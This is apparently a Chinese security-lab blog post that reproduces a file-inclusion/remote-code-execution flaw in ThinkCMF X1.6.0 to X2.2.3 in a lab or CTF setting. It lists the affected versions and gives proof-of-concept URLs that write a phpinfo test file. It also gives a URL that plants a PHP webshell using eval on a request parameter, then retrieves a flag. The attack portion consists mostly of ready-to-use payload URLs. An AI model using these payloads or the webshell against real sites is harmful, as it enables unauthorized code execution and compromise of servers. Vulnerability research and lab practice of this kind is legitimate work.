【初级】thinkcmf 文件包含 x1.6.0-x2.2.3

漏洞描述:攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。
影响版本:

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

参考资料:

POC:

?a=fetch&templateFile=public/index&prefix="&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>
------------------------
?a=display&templateFile=README.md

漏洞复现:

  • http://123.58.224.8:61256/?a=fetch&templateFile=public/index&prefix=%22&content=%3Cphp%3Efile_put_contents(%27test.php%27,%27%3C?php%20phpinfo();?%3E%27)%3C/php%3E
图片[1]-【初级】thinkcmf 文件包含 x1.6.0-x2.2.3-NGC660安全实验室
  • 写马
    • http://123.58.224.8:61256/?a=fetch&templateFile=public/index&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27cmd.php%27,%27%3C?php%20eval($_REQUEST[8]);%20?%3E%27)%3C/php%3E
图片[2]-【初级】thinkcmf 文件包含 x1.6.0-x2.2.3-NGC660安全实验室
  • 获取flag
图片[3]-【初级】thinkcmf 文件包含 x1.6.0-x2.2.3-NGC660安全实验室
© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    请登录后查看评论内容